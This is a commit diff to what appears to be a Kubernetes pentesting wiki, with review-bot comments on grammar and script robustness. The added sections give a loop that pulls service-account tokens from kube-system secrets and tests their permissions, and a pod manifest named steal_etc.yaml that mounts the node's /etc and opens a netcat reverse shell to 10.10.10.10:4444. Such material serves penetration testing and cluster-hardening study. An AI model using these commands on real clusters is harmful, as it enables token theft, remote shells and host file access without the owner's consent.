GitBook: [master] 454 pages modified

CPol 2021-04-29 12:12:01 +00:00 committed by gitbook-bot
parent f7b6e4a914
commit b486b9fee1
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 41 additions and 1 deletions

@ -74,7 +74,7 @@ They open a streaming connection that returns you the full manifest of a Deploym
{% hint style="danger" %}
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to add the option `-o json` or `-o yaml`
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
{% endhint %}
### Get namespaces
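Review bot: The replacement hint line tells readers to use `describe` instead of `get` and drops the `-o json` / `-o yaml` option altogether, but the two do different jobs: `describe` prints a human-readable summary, while `get -o json` or `-o yaml` returns the full object as the API server stores it. Suggest keeping both options in the hint rather than swapping one for the other, and fixing the grammar while here ("commands indicates" should be "commands indicate").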
@ -115,6 +115,12 @@ https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/secrets/
{% endtab %}
{% endtabs %}
If you can read secrets you can use the following lines to get the privileges related to each to token:
```bash
for token in `./kubectl describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; ./kubectl --token $token auth can-i --list; echo; done
```
### Get Current Privileges
{% tabs %}
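Review bot: The token extraction in the added loop, `grep "token:" | cut -d " " -f 7`, depends on the exact number of spaces that `describe` pads after the `token:` label, so any change in column alignment silently yields empty or wrong fields; `awk '$1 == "token:" {print $2}'` splits on any run of whitespace and is sturdier. `$token` should be quoted in both `echo` and `--token`, and `$(...)` is preferable to backticks. The lead-in sentence has a stray word ("related to each to token"), and the loop calls `./kubectl` where the other commands on the page use plain `kubectl`.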

@ -89,6 +89,40 @@ So just create the malicious pod and expect the secrets in port 6666:
![](../../.gitbook/assets/image%20%28470%29.png)
## **Pod Creationv2**
Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
{% code title="steal\_etc.yaml" %}
```yaml
apiVersion: v1
kind: Pod
metadata:
name: stealetc-pod
spec:
containers:
- name: givemeyouretc
image: alpine
command: ["/bin/sh"]
args: ["-c", "nc 10.10.10.10 4444 -e /bin/sh"]
volumeMounts:
- mountPath: /mnt
name: volume
volumes:
- name: volume
hostPath:
path: /etc
```
{% endcode %}
Create the pod with:
```bash
kubectl --token $token create -f abuse2.yaml
```
And capturing the reverse shell you can find the `/etc` directory of the node mounted in `/mnt` inside the pod.
## **Create/Update Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs**
Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.**
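Review bot: The manifest is titled `steal_etc.yaml` but the create command loads `abuse2.yaml`, so the steps do not line up as written; use one filename in both places. The text also says the permission is over kube-system, yet neither the manifest's `metadata` nor the `kubectl create` line names a namespace, so add `-n kube-system` or a `namespace:` field if that is what is meant. Wording nits: "Pod Creationv2" needs a space, "you can also be able to mount" and "it's possible can use" double up their verbs, and the bold markers in "a**buse them" split the word.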